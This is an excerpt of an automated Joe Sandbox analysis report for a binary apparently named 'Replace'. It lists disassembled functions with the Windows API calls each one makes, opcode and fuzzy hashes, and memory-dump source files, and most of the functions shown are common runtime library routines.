                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5dfde5d9db4e556fb90d3825854bbf0a35390cb83f3d155f10ace826a719baa6
                                                                                                                                                                                                              • Instruction ID: 975db0004c3c766bf1d36eb48f28b38c2032daa853c1f382d012a0ad782dfee3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dfde5d9db4e556fb90d3825854bbf0a35390cb83f3d155f10ace826a719baa6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5811727590121DEBEB10ABA89CA4DFFB3ECEB04750B8548A6E952D3540EBB49D048A64
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD4236 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD424E
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4260
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4272
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4284
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4296
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: a6d834771e8c14cad08c139b658d696a49d5a496b287ea207789e3ec5c4fa485
                                                                                                                                                                                                              • Instruction ID: 0649052c193ce398176a48b8b5d3a8e84e6082c24a77092a44633a605021f491
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6d834771e8c14cad08c139b658d696a49d5a496b287ea207789e3ec5c4fa485
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56F0FF725292406F8624EB6CE5C6C5AF3E9EA147507540D8BF184DB701EF31FC804E64
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB7BA9 Relevance: 7.5, APIs: 6, Instructions: 34sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 00BB7BB6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 00BB7BC1
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32 ref: 00BB7BC7
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BB7BCF
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 00BB7BD6
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32 ref: 00BB7BDC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Enter$Leave$Sleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2452663664-0
                                                                                                                                                                                                              • Opcode ID: ffc21e6261e67874a9ba6f896b7ab50ae5a9f6de474ad48da135090709125539
                                                                                                                                                                                                              • Instruction ID: d044b973b295935455f2e2193873621819c22cf0ecbf87bbfd3d54f1dd3c421f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffc21e6261e67874a9ba6f896b7ab50ae5a9f6de474ad48da135090709125539
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E0E5122CB618E7823123751C30DFBEBDC8E9725130A0446E38093210DFD558014AA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB1E8F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00BB1EC5
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000075), ref: 00BB1ED1
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00BB1F3C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                              • String ID: _
                                                                                                                                                                                                              • API String ID: 1717984340-701932520
                                                                                                                                                                                                              • Opcode ID: f8cb6c62b10f06861b4b3e344937778c1b80d72e9fc3f4c9a1563f4e43eec709
                                                                                                                                                                                                              • Instruction ID: b7eb754de67549823eb2eafb4842fccc3449be41f405a4f5e5cd69411fcd9886
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8cb6c62b10f06861b4b3e344937778c1b80d72e9fc3f4c9a1563f4e43eec709
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16317870108346EFDB15CF19D854ABBBBE9EF95304F04886DF09486210E3B0DD08DB62
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BCEFC4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                              • Opcode ID: 3844a8e965091c76b159446659c498e34039480d25ef15a3ade92253f53aec35
                                                                                                                                                                                                              • Instruction ID: 29da500f8a87ad32ff5d333a7c74a1a66434d7b6e8199687a637bdea240340fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3844a8e965091c76b159446659c498e34039480d25ef15a3ade92253f53aec35
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D551AD72600207EFEB299F14D881F7AB7E6EB04B00F2481FEE91597292E731AD41C790
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD2935 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD2F57: _free.LIBCMT ref: 00BD2F65
                                                                                                                                                                                                                • Part of subcall function 00BD3B2B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00BD6B3F,0000FDE9,00000000,?,?,?,00BD68B8,0000FDE9,00000000,?), ref: 00BD3BD7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BD299D
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00BD29A4
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00BD29E3
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00BD29EA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 167067550-0
                                                                                                                                                                                                              • Opcode ID: 965485f4e9c6e5e98290195d126b144f6968b8deea70db43f29e939b1ee49bcc
                                                                                                                                                                                                              • Instruction ID: b09ffdb0f749d468a834c04686d060b42015465feca7778aa7445c41da1b4d12
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 965485f4e9c6e5e98290195d126b144f6968b8deea70db43f29e939b1ee49bcc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8421C471604255BF9B20AF658CD092BF7ECEF2436471049A7F82997345FB34EC019BA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD1F74 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00BD0380,00BE47D8,0000000C), ref: 00BD1F79
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1FD6
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD200C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,00BD0380,00BE47D8,0000000C), ref: 00BD2017
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                              • Opcode ID: 0a7d515ee619d94371fd60ecfa8b01a382a90f09b5531bc6c99879648b7622e1
                                                                                                                                                                                                              • Instruction ID: 7ec6e051e0a3b53b1bac4e962bcdb42a26ae63734be8f8f8451276a5f475f28e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a7d515ee619d94371fd60ecfa8b01a382a90f09b5531bc6c99879648b7622e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD11A7323055A07A9621776D6CC1D2BA7DADBA07B572405A7FA28C73A2FF254C055510
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD20CB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000072,-00000086,00000001,00BD1B90,00BD27C0,-00000126,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD20D0
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD212D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD2163
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00000005,000000FF,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD216E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                              • Opcode ID: 4324b912107885ae4042dc34db38136d17390fa7a906ccd80dbb00045f695942
                                                                                                                                                                                                              • Instruction ID: 5147b2973eeb7de31986ef24f578c60b6aa2c9d9321b8615a2bff0533d420279
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4324b912107885ae4042dc34db38136d17390fa7a906ccd80dbb00045f695942
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E110C322065E17AD6216778ACC5D2BA7DADBF07B172102E7FB24D73E2FE218C055510
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB3583 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00BB358A
                                                                                                                                                                                                                • Part of subcall function 00BB227E: CreateFileA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00BB22B6
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000001,00000003,02000000,00000040,00BB353A,?,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB35C0
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,-00000022,?,00000000,00000001,00000003,02000000,00000040,00BB353A,?,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB35CF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB35E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseFile$CreateH_prolog3_Information
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2437482437-0
                                                                                                                                                                                                              • Opcode ID: 876788944dfb2e29d30ef352151e5ae7c196d4ef94ce62469f45162f7d75156c
                                                                                                                                                                                                              • Instruction ID: ec91e17402a0ca29e9e65fba63d39ab5543dc27399b273d540e4fa85bc24dd7c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 876788944dfb2e29d30ef352151e5ae7c196d4ef94ce62469f45162f7d75156c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9421FA70D01704DBDB28CFA4E854A9DBBF1BF18710F10866EE46AA7390D7716A06CF50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2FA4 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB2EDD: FindClose.KERNEL32(0000002A,0000002A,00BB2F26,?,?,00000001), ref: 00BB2EE7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000078,?,?,00000001), ref: 00BB2FD6
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000001), ref: 00BB2FF1
                                                                                                                                                                                                              • FindFirstStreamW.KERNELBASE(FFFFFBEF,00000000,?,00000000), ref: 00BB3003
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BB3010
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4071060300-0
                                                                                                                                                                                                              • Opcode ID: b1fcba3cea5a37e0649b47565ad0eb6809473fa1cf6b70ecf157e5754037c8b0
                                                                                                                                                                                                              • Instruction ID: 6b9df901f19dc21a37e36a516e03e820dcb69a02f09102c70a99bb83bd7dfa9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1fcba3cea5a37e0649b47565ad0eb6809473fa1cf6b70ecf157e5754037c8b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6911A031504208DFCB20AF64DC89BFAB3F9EB55711F10469AE91597290DFB09A84CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB251E Relevance: 6.0, APIs: 4, Instructions: 33filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 00BB2529
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00BB2548
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,00000000,00000000,?,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00BB255C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00BB2568
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2291555494-0
                                                                                                                                                                                                              • Opcode ID: 85ddb4bf0223cd396487083e95c7ecbf4b18e77ce02b776532418dc67d95b5b5
                                                                                                                                                                                                              • Instruction ID: 6f9892523368345a8208775d47647e9164cba89bd3f09c96de76105c5f2d4aae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85ddb4bf0223cd396487083e95c7ecbf4b18e77ce02b776532418dc67d95b5b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF0E570582318BFF3201B30ACA8FBB678DEF15354F014246F161A70E09B944E099370
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD7696 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00BD70F4,00000000,00000001,00000000,00000000,?,00BD658E,?,?,00000000), ref: 00BD76AD
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00BD70F4,00000000,00000001,00000000,00000000,?,00BD658E,?,?,00000000,?,00000000,?,00BD6ADA,00000020), ref: 00BD76B9
                                                                                                                                                                                                                • Part of subcall function 00BD767F: CloseHandle.KERNEL32(FFFFFFFE,00BD76C9,?,00BD70F4,00000000,00000001,00000000,00000000,?,00BD658E,?,?,00000000,?,00000000), ref: 00BD768F
                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00BD76C9
                                                                                                                                                                                                                • Part of subcall function 00BD7641: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00BD7670,00BD70E1,00000000,?,00BD658E,?,?,00000000,?), ref: 00BD7654
                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00BD70F4,00000000,00000001,00000000,00000000,?,00BD658E,?,?,00000000,?), ref: 00BD76DE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                              • Opcode ID: 69fd18e5c2a0a1462d7b1faf08b73286d9cdb2bae0fb2391aad7b870d185a9ad
                                                                                                                                                                                                              • Instruction ID: 61c2a4b234c43bcdd6601cb1542c120be88a5cfa0ef30b747cfa8b6456d925a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69fd18e5c2a0a1462d7b1faf08b73286d9cdb2bae0fb2391aad7b870d185a9ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F01C36045558FBCF222F96DC14DCEBFA6EB187A0B014052FA1886220FF32C820DB94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD161A Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1623
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1636
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1647
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1658
